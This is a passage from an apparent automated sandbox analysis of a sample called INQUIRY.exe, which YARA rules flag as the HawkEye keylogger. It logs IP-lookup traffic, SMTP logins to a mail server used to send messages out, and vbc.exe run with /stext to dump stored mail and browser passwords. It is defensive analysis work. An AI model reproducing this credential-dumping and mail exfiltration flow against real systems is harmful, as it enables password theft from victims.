Nov 18, 2020 15:01:59.106956959 CET | 8.8.8.8 | 192.168.2.4 | 0x7cb6 | No error (0) | whatismyipaddress.com |  | 104.16.154.36 | A (IP address) | IN (0x0001)
Nov 18, 2020 15:01:59.106956959 CET | 8.8.8.8 | 192.168.2.4 | 0x7cb6 | No error (0) | whatismyipaddress.com |  | 104.16.155.36 | A (IP address) | IN (0x0001)
Nov 18, 2020 15:02:23.815956116 CET | 8.8.8.8 | 192.168.2.4 | 0xb5a3 | No error (0) | mail.iigcest.com |  | 166.62.27.57 | A (IP address) | IN (0x0001)
Nov 18, 2020 15:02:38.164376020 CET | 8.8.8.8 | 192.168.2.4 | 0x8bd0 | Name error (3) | 121.205.6.0.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001)
Nov 18, 2020 15:02:38.471159935 CET | 8.8.8.8 | 192.168.2.4 | 0x9673 | No error (0) | whatismyipaddress.com |  | 104.16.154.36 | A (IP address) | IN (0x0001)
Nov 18, 2020 15:02:38.471159935 CET | 8.8.8.8 | 192.168.2.4 | 0x9673 | No error (0) | whatismyipaddress.com |  | 104.16.155.36 | A (IP address) | IN (0x0001)
Nov 18, 2020 15:02:38.592199087 CET | 8.8.8.8 | 192.168.2.4 | 0x19c | No error (0) | whatismyipaddress.com |  | 104.16.154.36 | A (IP address) | IN (0x0001)
Nov 18, 2020 15:02:38.592199087 CET | 8.8.8.8 | 192.168.2.4 | 0x19c | No error (0) | whatismyipaddress.com |  | 104.16.155.36 | A (IP address) | IN (0x0001)
Nov 18, 2020 15:03:05.904856920 CET | 8.8.8.8 | 192.168.2.4 | 0x697a | No error (0) | mail.iigcest.com |  | 166.62.27.57 | A (IP address) | IN (0x0001)
Nov 18, 2020 15:03:20.992511988 CET | 8.8.8.8 | 192.168.2.4 | 0xa2aa | Name error (3) | 121.205.6.0.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001)
Nov 18, 2020 15:03:21.314351082 CET | 8.8.8.8 | 192.168.2.4 | 0x557a | No error (0) | whatismyipaddress.com |  | 104.16.154.36 | A (IP address) | IN (0x0001)
Nov 18, 2020 15:03:21.314351082 CET | 8.8.8.8 | 192.168.2.4 | 0x557a | No error (0) | whatismyipaddress.com |  | 104.16.155.36 | A (IP address) | IN (0x0001)
Nov 18, 2020 15:03:21.424304962 CET | 8.8.8.8 | 192.168.2.4 | 0x5ae3 | No error (0) | whatismyipaddress.com |  | 104.16.155.36 | A (IP address) | IN (0x0001)
Nov 18, 2020 15:03:21.424304962 CET | 8.8.8.8 | 192.168.2.4 | 0x5ae3 | No error (0) | whatismyipaddress.com |  | 104.16.154.36 | A (IP address) | IN (0x0001)
Nov 18, 2020 15:03:33.483230114 CET | 8.8.8.8 | 192.168.2.4 | 0x53b6 | Name error (3) | 121.205.6.0.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001)
Nov 18, 2020 15:03:33.802285910 CET | 8.8.8.8 | 192.168.2.4 | 0x5dfb | No error (0) | whatismyipaddress.com |  | 104.16.155.36 | A (IP address) | IN (0x0001)
Nov 18, 2020 15:03:33.802285910 CET | 8.8.8.8 | 192.168.2.4 | 0x5dfb | No error (0) | whatismyipaddress.com |  | 104.16.154.36 | A (IP address) | IN (0x0001)
Nov 18, 2020 15:03:33.917220116 CET | 8.8.8.8 | 192.168.2.4 | 0x5d23 | No error (0) | whatismyipaddress.com |  | 104.16.155.36 | A (IP address) | IN (0x0001)
Nov 18, 2020 15:03:33.917220116 CET | 8.8.8.8 | 192.168.2.4 | 0x5d23 | No error (0) | whatismyipaddress.com |  | 104.16.154.36 | A (IP address) | IN (0x0001)
Nov 18, 2020 15:04:00.638335943 CET | 8.8.8.8 | 192.168.2.4 | 0x70c7 | Name error (3) | 121.205.6.0.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001)
Nov 18, 2020 15:04:00.700529099 CET | 8.8.8.8 | 192.168.2.4 | 0x279f | No error (0) | whatismyipaddress.com |  | 104.16.155.36 | A (IP address) | IN (0x0001)
Nov 18, 2020 15:04:00.700529099 CET | 8.8.8.8 | 192.168.2.4 | 0x279f | No error (0) | whatismyipaddress.com |  | 104.16.154.36 | A (IP address) | IN (0x0001)
Nov 18, 2020 15:04:00.791821003 CET | 8.8.8.8 | 192.168.2.4 | 0x506 | No error (0) | whatismyipaddress.com |  | 104.16.155.36 | A (IP address) | IN (0x0001)
                                                                      Nov 18, 2020 15:04:00.791821003 CET8.8.8.8192.168.2.40x506No error (0)whatismyipaddress.com104.16.154.36A (IP address)IN (0x0001)

                                                                      HTTP Request Dependency Graph

                                                                      • whatismyipaddress.com

                                                                      HTTP Packets

                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      0 | 192.168.2.4 | 49743 | 104.16.154.36 | 80 | C:\Users\user\Desktop\INQUIRY.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Nov 18, 2020 15:01:59.048484087 CET | 348 | OUT | GET / HTTP/1.1
                                                                          Host: whatismyipaddress.com
                                                                          Connection: Keep-Alive
                                                                      Nov 18, 2020 15:01:59.071091890 CET | 349 | IN | HTTP/1.1 301 Moved Permanently
                                                                          Date: Wed, 18 Nov 2020 14:01:59 GMT
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Cache-Control: max-age=3600
                                                                          Expires: Wed, 18 Nov 2020 15:01:59 GMT
                                                                          Location: https://whatismyipaddress.com/
                                                                          cf-request-id: 067d42940f0000c2810dbe2000000001
                                                                          Server: cloudflare
                                                                          CF-RAY: 5f423a0018cdc281-FRA
                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      1 | 192.168.2.4 | 49759 | 104.16.154.36 | 80 | C:\Users\user\Desktop\INQUIRY.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Nov 18, 2020 15:02:38.523021936 CET | 844 | OUT | GET / HTTP/1.1
                                                                          Host: whatismyipaddress.com
                                                                          Connection: Keep-Alive
                                                                      Nov 18, 2020 15:02:38.549550056 CET | 844 | IN | HTTP/1.1 301 Moved Permanently
                                                                          Date: Wed, 18 Nov 2020 14:02:38 GMT
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Cache-Control: max-age=3600
                                                                          Expires: Wed, 18 Nov 2020 15:02:38 GMT
                                                                          Location: https://whatismyipaddress.com/
                                                                          cf-request-id: 067d432e42000063776eb34000000001
                                                                          Server: cloudflare
                                                                          CF-RAY: 5f423af6cb926377-FRA
                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      2 | 192.168.2.4 | 49776 | 104.16.154.36 | 80 | C:\Users\user\Desktop\INQUIRY.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Nov 18, 2020 15:03:21.354469061 CET | 5549 | OUT | GET / HTTP/1.1
                                                                          Host: whatismyipaddress.com
                                                                          Connection: Keep-Alive
                                                                      Nov 18, 2020 15:03:21.376317978 CET | 5550 | IN | HTTP/1.1 301 Moved Permanently
                                                                          Date: Wed, 18 Nov 2020 14:03:21 GMT
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Cache-Control: max-age=3600
                                                                          Expires: Wed, 18 Nov 2020 15:03:21 GMT
                                                                          Location: https://whatismyipaddress.com/
                                                                          cf-request-id: 067d43d59000002c2ed824b000000001
                                                                          Server: cloudflare
                                                                          CF-RAY: 5f423c0288692c2e-FRA
                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      3 | 192.168.2.4 | 49783 | 104.16.155.36 | 80 | C:\Users\user\Desktop\INQUIRY.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Nov 18, 2020 15:03:33.843103886 CET | 5584 | OUT | GET / HTTP/1.1
                                                                          Host: whatismyipaddress.com
                                                                          Connection: Keep-Alive
                                                                      Nov 18, 2020 15:03:33.867271900 CET | 5584 | IN | HTTP/1.1 301 Moved Permanently
                                                                          Date: Wed, 18 Nov 2020 14:03:33 GMT
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Cache-Control: max-age=3600
                                                                          Expires: Wed, 18 Nov 2020 15:03:33 GMT
                                                                          Location: https://whatismyipaddress.com/
                                                                          cf-request-id: 067d44065900002b95012f5000000001
                                                                          Server: cloudflare
                                                                          CF-RAY: 5f423c508af42b95-FRA
                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      4 | 192.168.2.4 | 49790 | 104.16.155.36 | 80 | C:\Users\user\Desktop\INQUIRY.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Nov 18, 2020 15:04:00.721941948 CET | 5624 | OUT | GET / HTTP/1.1
                                                                          Host: whatismyipaddress.com
                                                                          Connection: Keep-Alive
                                                                      Nov 18, 2020 15:04:00.753989935 CET | 5624 | IN | HTTP/1.1 301 Moved Permanently
                                                                          Date: Wed, 18 Nov 2020 14:04:00 GMT
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Cache-Control: max-age=3600
                                                                          Expires: Wed, 18 Nov 2020 15:04:00 GMT
                                                                          Location: https://whatismyipaddress.com/
                                                                          cf-request-id: 067d446f5c0000d6bda83ec000000001
                                                                          Server: cloudflare
                                                                          CF-RAY: 5f423cf88d18d6bd-FRA
                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                      SMTP Packets

                                                                      Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
                                                                      Nov 18, 2020 15:02:24.647198915 CET | 587 | 49750 | 166.62.27.57 | 192.168.2.4 | 220-sg2plcpnl0157.prod.sin2.secureserver.net ESMTP Exim 4.93 #2 Wed, 18 Nov 2020 07:02:24 -0700
                                                                          220-We do not authorize the use of this system to transport unsolicited,
                                                                          220 and/or bulk e-mail.
                                                                      Nov 18, 2020 15:02:24.825001001 CET | 49750 | 587 | 192.168.2.4 | 166.62.27.57 | EHLO 445817
                                                                      Nov 18, 2020 15:02:25.106144905 CET | 587 | 49750 | 166.62.27.57 | 192.168.2.4 | 250-sg2plcpnl0157.prod.sin2.secureserver.net Hello 445817 [84.17.52.40]
                                                                          250-SIZE 52428800
                                                                          250-8BITMIME
                                                                          250-PIPELINING
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-CHUNKING
                                                                          250-STARTTLS
                                                                          250-SMTPUTF8
                                                                          250 HELP
                                                                      Nov 18, 2020 15:02:25.106544971 CET | 49750 | 587 | 192.168.2.4 | 166.62.27.57 | AUTH login YW5zYWZAaWlnY2VzdC5jb20=
                                                                      Nov 18, 2020 15:02:25.388585091 CET | 587 | 49750 | 166.62.27.57 | 192.168.2.4 | 334 UGFzc3dvcmQ6
                                                                      Nov 18, 2020 15:02:25.858115911 CET | 587 | 49750 | 166.62.27.57 | 192.168.2.4 | 235 Authentication succeeded
                                                                      Nov 18, 2020 15:02:25.858395100 CET | 49750 | 587 | 192.168.2.4 | 166.62.27.57 | MAIL FROM:<ansaf@iigcest.com>
                                                                      Nov 18, 2020 15:02:26.139451027 CET | 587 | 49750 | 166.62.27.57 | 192.168.2.4 | 250 OK
                                                                      Nov 18, 2020 15:02:26.139874935 CET | 49750 | 587 | 192.168.2.4 | 166.62.27.57 | RCPT TO:<ansaf@iigcest.com>
                                                                      Nov 18, 2020 15:02:26.422636032 CET | 587 | 49750 | 166.62.27.57 | 192.168.2.4 | 250 Accepted
                                                                      Nov 18, 2020 15:02:26.422939062 CET | 49750 | 587 | 192.168.2.4 | 166.62.27.57 | DATA
                                                                      Nov 18, 2020 15:02:26.703959942 CET | 587 | 49750 | 166.62.27.57 | 192.168.2.4 | 354 Enter message, ending with "." on a line by itself
                                                                      Nov 18, 2020 15:02:26.705427885 CET | 49750 | 587 | 192.168.2.4 | 166.62.27.57 | .
                                                                      Nov 18, 2020 15:02:27.002060890 CET | 587 | 49750 | 166.62.27.57 | 192.168.2.4 | 250 OK id=1kfO2U-008ZMO-Gu
                                                                      Nov 18, 2020 15:03:06.695435047 CET | 587 | 49774 | 166.62.27.57 | 192.168.2.4 | 220-sg2plcpnl0157.prod.sin2.secureserver.net ESMTP Exim 4.93 #2 Wed, 18 Nov 2020 07:03:06 -0700
                                                                          220-We do not authorize the use of this system to transport unsolicited,
                                                                          220 and/or bulk e-mail.
                                                                      Nov 18, 2020 15:03:06.695717096 CET | 49774 | 587 | 192.168.2.4 | 166.62.27.57 | EHLO 445817
                                                                      Nov 18, 2020 15:03:06.958623886 CET | 587 | 49774 | 166.62.27.57 | 192.168.2.4 | 250-sg2plcpnl0157.prod.sin2.secureserver.net Hello 445817 [84.17.52.40]
                                                                          250-SIZE 52428800
                                                                          250-8BITMIME
                                                                          250-PIPELINING
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-CHUNKING
                                                                          250-STARTTLS
                                                                          250-SMTPUTF8
                                                                          250 HELP
                                                                      Nov 18, 2020 15:03:06.959141970 CET | 49774 | 587 | 192.168.2.4 | 166.62.27.57 | AUTH login YW5zYWZAaWlnY2VzdC5jb20=
                                                                      Nov 18, 2020 15:03:07.222193003 CET | 587 | 49774 | 166.62.27.57 | 192.168.2.4 | 334 UGFzc3dvcmQ6
                                                                      Nov 18, 2020 15:03:07.495678902 CET | 587 | 49774 | 166.62.27.57 | 192.168.2.4 | 235 Authentication succeeded
                                                                      Nov 18, 2020 15:03:07.495965004 CET | 49774 | 587 | 192.168.2.4 | 166.62.27.57 | MAIL FROM:<ansaf@iigcest.com>
                                                                      Nov 18, 2020 15:03:07.758713007 CET | 587 | 49774 | 166.62.27.57 | 192.168.2.4 | 250 OK
                                                                      Nov 18, 2020 15:03:07.758955002 CET | 49774 | 587 | 192.168.2.4 | 166.62.27.57 | RCPT TO:<ansaf@iigcest.com>
                                                                      Nov 18, 2020 15:03:08.022917032 CET | 587 | 49774 | 166.62.27.57 | 192.168.2.4 | 250 Accepted
                                                                      Nov 18, 2020 15:03:08.025825977 CET | 49774 | 587 | 192.168.2.4 | 166.62.27.57 | DATA
                                                                      Nov 18, 2020 15:03:08.288832903 CET | 587 | 49774 | 166.62.27.57 | 192.168.2.4 | 354 Enter message, ending with "." on a line by itself
                                                                      Nov 18, 2020 15:03:08.290122032 CET | 49774 | 587 | 192.168.2.4 | 166.62.27.57 | .
                                                                      Nov 18, 2020 15:03:08.570868969 CET | 587 | 49774 | 166.62.27.57 | 192.168.2.4 | 250 OK id=1kfO3A-008aRf-3m

                                                                      Code Manipulations

                                                                      Statistics

                                                                      Behavior


                                                                      System Behavior

                                                                      General

                                                                      Start time: 15:01:48
                                                                      Start date: 18/11/2020
                                                                      Path: C:\Users\user\Desktop\INQUIRY.exe
                                                                      Wow64 process (32bit): true
                                                                      Commandline: 'C:\Users\user\Desktop\INQUIRY.exe'
                                                                      Imagebase: 0x400000
                                                                      File size: 1009664 bytes
                                                                      MD5 hash: 0B940145D7D02E5B1B975C99DD5197A4
                                                                      Has elevated privileges: true
                                                                      Has administrator privileges: true
                                                                      Programmed in: Borland Delphi
                                                                      Yara matches:
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000000.00000002.656369760.00000000026D7000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000000.00000002.656369760.00000000026D7000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000000.00000002.656369760.00000000026D7000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000000.00000002.656369760.00000000026D7000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000000.00000002.656369760.00000000026D7000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation: low

                                                                      General

                                                                      Start time: 15:01:49
                                                                      Start date: 18/11/2020
                                                                      Path: C:\Users\user\Desktop\INQUIRY.exe
                                                                      Wow64 process (32bit): true
                                                                      Commandline: 'C:\Users\user\Desktop\INQUIRY.exe'
                                                                      Imagebase: 0x400000
                                                                      File size: 1009664 bytes
                                                                      MD5 hash: 0B940145D7D02E5B1B975C99DD5197A4
                                                                      Has elevated privileges: true
                                                                      Has administrator privileges: true
                                                                      Programmed in: .Net C# or VB.NET
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000001.00000002.741822453.0000000003A41000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000001.00000002.741822453.0000000003A41000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000001.00000002.735055042.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000001.00000002.735055042.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000001.00000002.735055042.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000001.00000002.735055042.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000001.00000002.735055042.0000000000402000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000001.00000002.735183511.0000000000497000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000001.00000002.735183511.0000000000497000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000001.00000002.735183511.0000000000497000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000001.00000002.735183511.0000000000497000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000001.00000002.735183511.0000000000497000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000001.00000002.736771009.00000000021E0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000001.00000002.736771009.00000000021E0000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000001.00000002.736771009.00000000021E0000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000001.00000002.736771009.00000000021E0000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000001.00000002.736771009.00000000021E0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
• Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000001.00000002.737371268.0000000002302000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
• Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000001.00000002.737371268.0000000002302000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000001.00000002.737371268.0000000002302000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000001.00000002.737371268.0000000002302000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000001.00000002.737371268.0000000002302000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

General

Start time: 15:01:50
Start date: 18/11/2020
Path: C:\Users\user\Desktop\INQUIRY.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\INQUIRY.exe' 2 5896 5358953
Imagebase: 0x400000
File size: 1009664 bytes
MD5 hash: 0B940145D7D02E5B1B975C99DD5197A4
Has elevated privileges: true
Has administrator privileges: true
Programmed in: Borland Delphi
Reputation: low

General

Start time: 15:01:59
Start date: 18/11/2020
Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
Wow64 process (32bit): true
Commandline: dw20.exe -x -s 2308
Imagebase: 0x10000000
File size: 33936 bytes
MD5 hash: 8D10DA8A3E11747E51F23C882C22BBC3
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 15:02:02
Start date: 18/11/2020
Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
Wow64 process (32bit): true
Commandline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
Imagebase: 0x400000
File size: 1171592 bytes
MD5 hash: C63ED21D5706A527419C9FBD730FFB2E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
Reputation: high

General

Start time: 15:02:03
Start date: 18/11/2020
Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
Wow64 process (32bit): true
Commandline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
Imagebase: 0x400000
File size: 1171592 bytes
MD5 hash: C63ED21D5706A527419C9FBD730FFB2E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000006.00000002.695692485.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
Reputation: high

General

Start time: 15:02:08
Start date: 18/11/2020
Path: C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\WerFault.exe -u -p 5896 -s 2216
Imagebase: 0x990000
File size: 434592 bytes
MD5 hash: 9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
• Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: high

General

Start time: 15:02:33
Start date: 18/11/2020
Path: C:\Users\user\Desktop\INQUIRY.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\Desktop\INQUIRY.exe
Imagebase: 0x400000
File size: 1009664 bytes
MD5 hash: 0B940145D7D02E5B1B975C99DD5197A4
Has elevated privileges: true
Has administrator privileges: true
Programmed in: Borland Delphi
Yara matches:
• Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
• Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000D.00000002.757155287.00000000026F7000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
• Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000D.00000002.757155287.00000000026F7000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000D.00000002.757155287.00000000026F7000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000D.00000002.757155287.00000000026F7000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000D.00000002.757155287.00000000026F7000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

General

Start time: 15:02:34
Start date: 18/11/2020
Path: C:\Users\user\Desktop\INQUIRY.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\Desktop\INQUIRY.exe
Imagebase: 0x400000
File size: 1009664 bytes
MD5 hash: 0B940145D7D02E5B1B975C99DD5197A4
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
• Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000010.00000001.752146287.00000000004D2000.00000040.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
• Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000010.00000001.752146287.00000000004D2000.00000040.00020000.sdmp, Author: Joe Security
